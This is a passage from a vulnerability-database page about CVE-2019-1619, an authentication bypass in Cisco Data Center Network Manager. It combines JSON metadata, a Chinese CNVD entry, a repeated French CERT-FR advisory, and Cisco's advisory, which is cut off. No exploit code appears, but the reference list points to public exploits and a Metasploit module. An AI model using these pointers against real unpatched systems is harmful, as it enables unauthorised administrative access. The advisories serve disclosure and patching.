        "db": "CNVD",
        "id": "CNVD-2019-19824"
      },
      {
        "db": "VULHUB",
        "id": "VHN-148311"
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-1619"
      },
      {
        "db": "BID",
        "id": "108902"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-005758"
      },
      {
        "db": "PACKETSTORM",
        "id": "154304"
      },
      {
        "db": "PACKETSTORM",
        "id": "153546"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201906-1044"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-1619"
      }
    ]
  },
  "id": "VAR-201906-0566",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2019-19824"
      },
      {
        "db": "VULHUB",
        "id": "VHN-148311"
      }
    ],
    "trust": 0.06999999999999999
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2019-19824"
      }
    ]
  },
  "last_update_date": "2024-02-13T22:54:09.172000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "cisco-sa-20190626-dcnm-bypass",
        "trust": 0.8,
        "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20190626-dcnm-bypass"
      },
      {
        "title": "CiscoDataCenterNetworkManager authentication bypasses the patch for the vulnerability",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchinfo/show/165639"
      },
      {
        "title": "Cisco Data Center Network Manager Fixes for access control error vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=94171"
      },
      {
        "title": "Cisco: Cisco Data Center Network Manager Authentication Bypass Vulnerability",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=cisco-sa-20190626-dcnm-bypass"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2019-19824"
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-1619"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-005758"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201906-1044"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-798",
        "trust": 1.1
      },
      {
        "problemtype": "CWE-284",
        "trust": 0.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-148311"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-005758"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-1619"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 3.5,
        "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20190626-dcnm-bypass"
      },
      {
        "trust": 2.4,
        "url": "http://packetstormsecurity.com/files/153546/cisco-data-center-network-manager-11.1-1-remote-code-execution.html"
      },
      {
        "trust": 1.8,
        "url": "http://www.securityfocus.com/bid/108902"
      },
      {
        "trust": 1.8,
        "url": "https://seclists.org/bugtraq/2019/jul/11"
      },
      {
        "trust": 1.8,
        "url": "http://seclists.org/fulldisclosure/2019/jul/7"
      },
      {
        "trust": 1.8,
        "url": "http://packetstormsecurity.com/files/154304/cisco-data-center-network-manager-unauthenticated-remote-code-execution.html"
      },
      {
        "trust": 1.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-1619"
      },
      {
        "trust": 0.9,
        "url": "http://www.cisco.com/"
      },
      {
        "trust": 0.8,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-1619"
      },
      {
        "trust": 0.7,
        "url": "https://www.exploit-db.com/exploits/47347"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.2315/"
      },
      {
        "trust": 0.6,
        "url": "https://vigilance.fr/vulnerability/cisco-data-center-network-manager-privilege-escalation-via-web-management-interface-session-29631"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-1620"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-1622"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/798.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://www.rapid7.com/db/modules/exploit/multi/http/cisco_dcnm_upload_2019/"
      },
      {
        "trust": 0.1,
        "url": "https://raw.githubusercontent.com/pedrib/poc/master/exploits/metasploit/cisco_dcnm_upload_2019.rb\u0027"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/rapid7/metasploit-framework"
      },
      {
        "trust": 0.1,
        "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20190626-dcnm-bypass\u0027"
      },
      {
        "trust": 0.1,
        "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20190626-dcnm-codex\u0027"
      },
      {
        "trust": 0.1,
        "url": "https://metasploit.com/download"
      },
      {
        "trust": 0.1,
        "url": "https://seclists.org/fulldisclosure/2019/jul/7\u0027"
      },
      {
        "trust": 0.1,
        "url": "https://www.cisco.com/c/en/us/products/collateral/cloud-systems-management/prime-data-center-network-manager/datasheet-c78-740978.html"
      },
      {
        "trust": 0.1,
        "url": "https://www.accenture.com/us-en/service-idefense-security-intelligence"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-1621"
      },
      {
        "trust": 0.1,
        "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20190626-dcnm-codex"
      },
      {
        "trust": 0.1,
        "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20190626-dcnm-file-dwnld"
      },
      {
        "trust": 0.1,
        "url": "https://www.gnu.org/licenses/gpl-3.0.en.html"
      },
      {
        "trust": 0.1,
        "url": "http://www.agileinfosec.co.uk/)"
      },
      {
        "trust": 0.1,
        "url": "http://www.agileinfosec.co.uk/"
      },
      {
        "trust": 0.1,
        "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20190626-dcnm-infodiscl"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2019-19824"
      },
      {
        "db": "VULHUB",
        "id": "VHN-148311"
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-1619"
      },
      {
        "db": "BID",
        "id": "108902"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-005758"
      },
      {
        "db": "PACKETSTORM",
        "id": "154304"
      },
      {
        "db": "PACKETSTORM",
        "id": "153546"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201906-1044"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-1619"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2019-19824"
      },
      {
        "db": "VULHUB",
        "id": "VHN-148311"
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-1619"
      },
      {
        "db": "BID",
        "id": "108902"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-005758"
      },
      {
        "db": "PACKETSTORM",
        "id": "154304"
      },
      {
        "db": "PACKETSTORM",
        "id": "153546"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201906-1044"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-1619"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2019-06-26T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2019-19824"
      },
      {
        "date": "2019-06-27T00:00:00",
        "db": "VULHUB",
        "id": "VHN-148311"
      },
      {
        "date": "2019-06-27T00:00:00",
        "db": "VULMON",
        "id": "CVE-2019-1619"
      },
      {
        "date": "2019-06-26T00:00:00",
        "db": "BID",
        "id": "108902"
      },
      {
        "date": "2019-06-28T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2019-005758"
      },
      {
        "date": "2019-09-02T18:04:06",
        "db": "PACKETSTORM",
        "id": "154304"
      },
      {
        "date": "2019-07-08T21:02:49",
        "db": "PACKETSTORM",
        "id": "153546"
      },
      {
        "date": "2019-06-26T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201906-1044"
      },
      {
        "date": "2019-06-27T03:15:09.433000",
        "db": "NVD",
        "id": "CVE-2019-1619"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2019-07-01T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2019-19824"
      },
      {
        "date": "2020-10-06T00:00:00",
        "db": "VULHUB",
        "id": "VHN-148311"
      },
      {
        "date": "2020-10-06T00:00:00",
        "db": "VULMON",
        "id": "CVE-2019-1619"
      },
      {
        "date": "2019-06-26T00:00:00",
        "db": "BID",
        "id": "108902"
      },
      {
        "date": "2019-06-28T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2019-005758"
      },
      {
        "date": "2020-10-09T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201906-1044"
      },
      {
        "date": "2020-10-06T19:55:16.210000",
        "db": "NVD",
        "id": "CVE-2019-1619"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "154304"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201906-1044"
      }
    ],
    "trust": 0.7
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Cisco Data Center Network Manager Vulnerabilities in access control",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-005758"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "trust management problem",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201906-1044"
      }
    ],
    "trust": 0.6
  }
}

CNVD-2019-19824

Vulnerability from cnvd - Published: 2019-06-26

Title

Cisco Data Center Network Manager认证绕过漏洞

Description

Cisco Data Center Network Manager (DCNM)是Cisco的一套数据中心网络管理器，可对网络进行多协议管理，并对交换机的运行状况和性能提供故障排除功能。 Cisco Data Center Network Manager (DCNM) 10.4(2)的基于Web的管理界面存在认证绕过漏洞。远程未认证攻击者可通过发送特制HTTP请求利用该漏洞获得管理员访问权限。

Severity

高

Patch Name

Cisco Data Center Network Manager认证绕过漏洞的补丁

Patch Description

Formal description

厂商已发布了漏洞修复程序，请及时关注更新： https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvo64641

Reference

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-bypass

Impacted products

Name
Cisco Cisco Data Center Network Manager 10.4(2)

Show details on source website

JSON

To clipboard

{
  "cves": {
    "cve": {
      "cveNumber": "CVE-2019-1619",
      "cveUrl": "https://nvd.nist.gov/vuln/detail/CVE-2019-1619"
    }
  },
  "description": "Cisco Data Center Network Manager (DCNM)\u662fCisco\u7684\u4e00\u5957\u6570\u636e\u4e2d\u5fc3\u7f51\u7edc\u7ba1\u7406\u5668\uff0c\u53ef\u5bf9\u7f51\u7edc\u8fdb\u884c\u591a\u534f\u8bae\u7ba1\u7406\uff0c\u5e76\u5bf9\u4ea4\u6362\u673a\u7684\u8fd0\u884c\u72b6\u51b5\u548c\u6027\u80fd\u63d0\u4f9b\u6545\u969c\u6392\u9664\u529f\u80fd\u3002\n\nCisco Data Center Network Manager (DCNM) 10.4(2)\u7684\u57fa\u4e8eWeb\u7684\u7ba1\u7406\u754c\u9762\u5b58\u5728\u8ba4\u8bc1\u7ed5\u8fc7\u6f0f\u6d1e\u3002\u8fdc\u7a0b\u672a\u8ba4\u8bc1\u653b\u51fb\u8005\u53ef\u901a\u8fc7\u53d1\u9001\u7279\u5236HTTP\u8bf7\u6c42\u5229\u7528\u8be5\u6f0f\u6d1e\u83b7\u5f97\u7ba1\u7406\u5458\u8bbf\u95ee\u6743\u9650\u3002",
  "discovererName": "Pedro Ribeiro",
  "formalWay": "\u5382\u5546\u5df2\u53d1\u5e03\u4e86\u6f0f\u6d1e\u4fee\u590d\u7a0b\u5e8f\uff0c\u8bf7\u53ca\u65f6\u5173\u6ce8\u66f4\u65b0\uff1a\r\nhttps://bst.cloudapps.cisco.com/bugsearch/bug/CSCvo64641",
  "isEvent": "\u901a\u7528\u8f6f\u786c\u4ef6\u6f0f\u6d1e",
  "number": "CNVD-2019-19824",
  "openTime": "2019-06-26",
  "patchDescription": "Cisco Data Center Network Manager (DCNM)\u662fCisco\u7684\u4e00\u5957\u6570\u636e\u4e2d\u5fc3\u7f51\u7edc\u7ba1\u7406\u5668\uff0c\u53ef\u5bf9\u7f51\u7edc\u8fdb\u884c\u591a\u534f\u8bae\u7ba1\u7406\uff0c\u5e76\u5bf9\u4ea4\u6362\u673a\u7684\u8fd0\u884c\u72b6\u51b5\u548c\u6027\u80fd\u63d0\u4f9b\u6545\u969c\u6392\u9664\u529f\u80fd\u3002\r\n\r\nCisco Data Center Network Manager (DCNM) 10.4(2)\u7684\u57fa\u4e8eWeb\u7684\u7ba1\u7406\u754c\u9762\u5b58\u5728\u8ba4\u8bc1\u7ed5\u8fc7\u6f0f\u6d1e\u3002\u8fdc\u7a0b\u672a\u8ba4\u8bc1\u653b\u51fb\u8005\u53ef\u901a\u8fc7\u53d1\u9001\u7279\u5236HTTP\u8bf7\u6c42\u5229\u7528\u8be5\u6f0f\u6d1e\u83b7\u5f97\u7ba1\u7406\u5458\u8bbf\u95ee\u6743\u9650\u3002\u76ee\u524d\uff0c\u4f9b\u5e94\u5546\u53d1\u5e03\u4e86\u5b89\u5168\u516c\u544a\u53ca\u76f8\u5173\u8865\u4e01\u4fe1\u606f\uff0c\u4fee\u590d\u4e86\u6b64\u6f0f\u6d1e\u3002",
  "patchName": "Cisco Data Center Network Manager\u8ba4\u8bc1\u7ed5\u8fc7\u6f0f\u6d1e\u7684\u8865\u4e01",
  "products": {
    "product": "Cisco Cisco Data Center Network Manager 10.4(2)"
  },
  "referenceLink": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-bypass",
  "serverity": "\u9ad8",
  "submitTime": "2019-06-27",
  "title": "Cisco Data Center Network Manager\u8ba4\u8bc1\u7ed5\u8fc7\u6f0f\u6d1e"
}

CERTFR-2019-AVI-297

Vulnerability from certfr_avis - Published: - Updated:

De multiples vulnérabilités ont été découvertes dans Cisco Data Center Network Manager. Elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance, un contournement de la politique de sécurité et une atteinte à l'intégrité des données.

Solution

Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).

None

Impacted products

	Vendor	Product	Description
	Cisco	N/A	Cisco Data Center Network Manager (DCNM) versions antérieures à 11.2(1)

References

Title

Publication Time

Tags

Bulletin de sécurité Cisco cisco-sa-20190626-dcnm-codex du 26 juin 2019	None	vendor-advisory
Bulletin de sécurité Cisco cisco-sa-20190626-dcnm-bypass du 26 juin 2019	None	vendor-advisory
Bulletin de sécurité Cisco cisco-sa-20190626-dcnm-file-dwnld du 26 juin 2019	None	vendor-advisory

Show details on source website

JSON

To clipboard

{
  "$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
  "affected_systems": [
    {
      "description": "Cisco Data Center Network Manager (DCNM) versions ant\u00e9rieures \u00e0 11.2(1)",
      "product": {
        "name": "N/A",
        "vendor": {
          "name": "Cisco",
          "scada": false
        }
      }
    }
  ],
  "affected_systems_content": null,
  "content": "## Solution\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des\ncorrectifs (cf. section Documentation).\n",
  "cves": [
    {
      "name": "CVE-2019-1620",
      "url": "https://www.cve.org/CVERecord?id=CVE-2019-1620"
    },
    {
      "name": "CVE-2019-1621",
      "url": "https://www.cve.org/CVERecord?id=CVE-2019-1621"
    },
    {
      "name": "CVE-2019-1619",
      "url": "https://www.cve.org/CVERecord?id=CVE-2019-1619"
    }
  ],
  "links": [],
  "reference": "CERTFR-2019-AVI-297",
  "revisions": [
    {
      "description": "Version initiale",
      "revision_date": "2019-06-27T00:00:00.000000"
    }
  ],
  "risks": [
    {
      "description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
    },
    {
      "description": "Atteinte \u00e0 l\u0027int\u00e9grit\u00e9 des donn\u00e9es"
    },
    {
      "description": "Contournement de la politique de s\u00e9curit\u00e9"
    }
  ],
  "summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans Cisco Data Center\nNetwork Manager. Elles permettent \u00e0 un attaquant de provoquer une\nex\u00e9cution de code arbitraire \u00e0 distance, un contournement de la\npolitique de s\u00e9curit\u00e9 et une atteinte \u00e0 l\u0027int\u00e9grit\u00e9 des donn\u00e9es.\n",
  "title": "Multiples vuln\u00e9rabilit\u00e9s dans Cisco Data Center Network Manager",
  "vendor_advisories": [
    {
      "published_at": null,
      "title": "Bulletin de s\u00e9curit\u00e9 Cisco cisco-sa-20190626-dcnm-codex du 26 juin 2019",
      "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-codex"
    },
    {
      "published_at": null,
      "title": "Bulletin de s\u00e9curit\u00e9 Cisco cisco-sa-20190626-dcnm-bypass du 26 juin 2019",
      "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-bypass"
    },
    {
      "published_at": null,
      "title": "Bulletin de s\u00e9curit\u00e9 Cisco cisco-sa-20190626-dcnm-file-dwnld du 26 juin 2019",
      "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-file-dwnld"
    }
  ]
}

CERTFR-2019-AVI-297

Vulnerability from certfr_avis - Published: - Updated:

Solution

Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).

None

Impacted products

	Vendor	Product	Description
	Cisco	N/A	Cisco Data Center Network Manager (DCNM) versions antérieures à 11.2(1)

References

Title

Publication Time

Tags

Bulletin de sécurité Cisco cisco-sa-20190626-dcnm-codex du 26 juin 2019	None	vendor-advisory
Bulletin de sécurité Cisco cisco-sa-20190626-dcnm-bypass du 26 juin 2019	None	vendor-advisory
Bulletin de sécurité Cisco cisco-sa-20190626-dcnm-file-dwnld du 26 juin 2019	None	vendor-advisory

Show details on source website

JSON

To clipboard

{
  "$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
  "affected_systems": [
    {
      "description": "Cisco Data Center Network Manager (DCNM) versions ant\u00e9rieures \u00e0 11.2(1)",
      "product": {
        "name": "N/A",
        "vendor": {
          "name": "Cisco",
          "scada": false
        }
      }
    }
  ],
  "affected_systems_content": null,
  "content": "## Solution\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des\ncorrectifs (cf. section Documentation).\n",
  "cves": [
    {
      "name": "CVE-2019-1620",
      "url": "https://www.cve.org/CVERecord?id=CVE-2019-1620"
    },
    {
      "name": "CVE-2019-1621",
      "url": "https://www.cve.org/CVERecord?id=CVE-2019-1621"
    },
    {
      "name": "CVE-2019-1619",
      "url": "https://www.cve.org/CVERecord?id=CVE-2019-1619"
    }
  ],
  "links": [],
  "reference": "CERTFR-2019-AVI-297",
  "revisions": [
    {
      "description": "Version initiale",
      "revision_date": "2019-06-27T00:00:00.000000"
    }
  ],
  "risks": [
    {
      "description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
    },
    {
      "description": "Atteinte \u00e0 l\u0027int\u00e9grit\u00e9 des donn\u00e9es"
    },
    {
      "description": "Contournement de la politique de s\u00e9curit\u00e9"
    }
  ],
  "summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans Cisco Data Center\nNetwork Manager. Elles permettent \u00e0 un attaquant de provoquer une\nex\u00e9cution de code arbitraire \u00e0 distance, un contournement de la\npolitique de s\u00e9curit\u00e9 et une atteinte \u00e0 l\u0027int\u00e9grit\u00e9 des donn\u00e9es.\n",
  "title": "Multiples vuln\u00e9rabilit\u00e9s dans Cisco Data Center Network Manager",
  "vendor_advisories": [
    {
      "published_at": null,
      "title": "Bulletin de s\u00e9curit\u00e9 Cisco cisco-sa-20190626-dcnm-codex du 26 juin 2019",
      "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-codex"
    },
    {
      "published_at": null,
      "title": "Bulletin de s\u00e9curit\u00e9 Cisco cisco-sa-20190626-dcnm-bypass du 26 juin 2019",
      "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-bypass"
    },
    {
      "published_at": null,
      "title": "Bulletin de s\u00e9curit\u00e9 Cisco cisco-sa-20190626-dcnm-file-dwnld du 26 juin 2019",
      "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-file-dwnld"
    }
  ]
}

CISCO-SA-20190626-DCNM-BYPASS

Vulnerability from csaf_cisco - Published: 2019-06-26 16:00 - Updated: 2019-09-19 16:08

Summary

Cisco Data Center Network Manager Authentication Bypass Vulnerability

Notes

Summary

Vulnerable Products

The vulnerability affects Cisco Data Center Network Manager (DCNM) software releases prior to Release 11.1(1).

Products Confirmed Not Vulnerable

Only products listed in the Vulnerable Products ["#vp"] section of this advisory are known to be affected by this vulnerability.

Details

An attacker may obtain a valid session cookie without knowing the administrative user password by sending a specially crafted HTTP request to a specific web servlet that is available on affected devices. Cisco deprecated the use of the affected web servlet in DCNM Software Release 11.0(1). There is no known attack vector on that version. Cisco removed the affected web servlet completely in DCNM Software Release 11.1(1).

Workarounds

There are no workarounds that address this vulnerability.

Fixed Software

Cisco has released free software updates that address the vulnerability described in this advisory. Customers may only install and expect support for software versions and feature sets for which they have purchased a license. By installing, downloading, accessing, or otherwise using such software upgrades, customers agree to follow the terms of the Cisco software license: https://www.cisco.com/c/en/us/products/end-user-license-agreement.html ["https://www.cisco.com/c/en/us/products/end-user-license-agreement.html"] Additionally, customers may only download software for which they have a valid license, procured from Cisco directly, or through a Cisco authorized reseller or partner. In most cases this will be a maintenance upgrade to software that was previously purchased. Free security software updates do not entitle customers to a new software license, additional software feature sets, or major revision upgrades. When considering software upgrades, customers are advised to regularly consult the advisories for Cisco products, which are available from the Cisco Security Advisories and Alerts page ["https://www.cisco.com/go/psirt"], to determine exposure and a complete upgrade solution. In all cases, customers should ensure that the devices to be upgraded contain sufficient memory and confirm that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, customers are advised to contact the Cisco Technical Assistance Center (TAC) or their contracted maintenance providers. Customers Without Service Contracts Customers who purchase directly from Cisco but do not hold a Cisco service contract and customers who make purchases through third-party vendors but are unsuccessful in obtaining fixed software through their point of sale should obtain upgrades by contacting the Cisco TAC: https://www.cisco.com/c/en/us/support/web/tsd-cisco-worldwide-contacts.html ["https://www.cisco.com/c/en/us/support/web/tsd-cisco-worldwide-contacts.html"] Customers should have the product serial number available and be prepared to provide the URL of this advisory as evidence of entitlement to a free upgrade. Fixed Releases Cisco fixed this vulnerability in Cisco DCNM Software Release 11.1(1) and later. Customers can download Cisco Data Center Network Manager Software from the Software Center ["https://software.cisco.com/download/home"] on Cisco.com by doing the following: Click Browse All. Choose Cloud and Systems Management > Data Center Infrastructure Management > Data Center Network Manager. Access releases by using the left pane of the Data Center Network Manager page.

Vulnerability Policy

To learn about Cisco security vulnerability disclosure policies and publications, see the Security Vulnerability Policy ["https://sec.cloudapps.cisco.com/security/center/resources/security_vulnerability_policy.html"]. This document also contains instructions for obtaining fixed software and receiving security vulnerability information from Cisco.

Exploitation and Public Announcements

The Cisco Product Security Incident Response Team (PSIRT) is aware that proof-of-concept exploit code is available for the vulnerability described in this advisory. The Cisco PSIRT is not aware of any malicious use of the vulnerability that is described in this advisory.

Source

Cisco would like to thank the independent security researcher Pedro Ribeiro for reporting this vulnerability to the iDefense Vulnerability Contributor Program.

Legal Disclaimer

THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS DOCUMENT AT ANY TIME. A standalone copy or paraphrase of the text of this document that omits the distribution URL is an uncontrolled copy and may lack important information or contain factual errors. The information in this document is intended for end users of Cisco products.

JSON

To clipboard

{
  "document": {
    "acknowledgments": [
      {
        "summary": "Cisco would like to thank the independent security researcher Pedro Ribeiro for reporting this vulnerability to the iDefense Vulnerability Contributor Program."
      }
    ],
    "category": "csaf_security_advisory",
    "csaf_version": "2.0",
    "notes": [
      {
        "category": "summary",
        "text": "A vulnerability in the web-based management interface of Cisco Data Center Network Manager (DCNM) could allow an unauthenticated, remote attacker to bypass authentication and execute arbitrary actions with administrative privileges on an affected device.\r\n\r\nThe vulnerability is due to improper session management on affected DCNM software. An attacker could exploit this vulnerability by sending a crafted HTTP request to the affected device. A successful exploit could allow the attacker to gain administrative access on the affected device.\r\n\r\nCisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.\r\n\r\nThis advisory is available at the following link:\r\nhttps://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-bypass [\"https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-bypass\"]",
        "title": "Summary"
      },
      {
        "category": "general",
        "text": "The vulnerability affects Cisco Data Center Network Manager (DCNM) software releases prior to Release 11.1(1).",
        "title": "Vulnerable Products"
      },
      {
        "category": "general",
        "text": "Only products listed in the Vulnerable Products [\"#vp\"] section of this advisory are known to be affected by this vulnerability.",
        "title": "Products Confirmed Not Vulnerable"
      },
      {
        "category": "general",
        "text": "An attacker may obtain a valid session cookie without knowing the administrative user password by sending a specially crafted HTTP request to a specific web servlet that is available on affected devices.\r\n\r\nCisco  deprecated the use of the affected web servlet in DCNM Software Release 11.0(1). There is no known attack vector on that version.\r\n\r\nCisco removed the affected web servlet completely in DCNM Software Release 11.1(1).",
        "title": "Details"
      },
      {
        "category": "general",
        "text": "There are no workarounds that address this vulnerability.",
        "title": "Workarounds"
      },
      {
        "category": "general",
        "text": "Cisco has released free software updates that address the vulnerability described in this advisory. Customers may only install and expect support for software versions and feature sets for which they have purchased a license. By installing, downloading, accessing, or otherwise using such software upgrades, customers agree to follow the terms of the Cisco software license:\r\nhttps://www.cisco.com/c/en/us/products/end-user-license-agreement.html [\"https://www.cisco.com/c/en/us/products/end-user-license-agreement.html\"]\r\n\r\nAdditionally, customers may only download software for which they have a valid license, procured from Cisco directly, or through a Cisco authorized reseller or partner. In most cases this will be a maintenance upgrade to software that was previously purchased. Free security software updates do not entitle customers to a new software license, additional software feature sets, or major revision upgrades.\r\n\r\nWhen considering software upgrades, customers are advised to regularly consult the advisories for Cisco products, which are available from the Cisco Security Advisories and Alerts page [\"https://www.cisco.com/go/psirt\"], to determine exposure and a complete upgrade solution.\r\n\r\nIn all cases, customers should ensure that the devices to be upgraded contain sufficient memory and confirm that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, customers are advised to contact the Cisco Technical Assistance Center (TAC) or their contracted maintenance providers.\r\n\r\nCustomers Without Service Contracts\r\n\r\nCustomers who purchase directly from Cisco but do not hold a Cisco service contract and customers who make purchases through third-party vendors but are unsuccessful in obtaining fixed software through their point of sale should obtain upgrades by contacting the Cisco 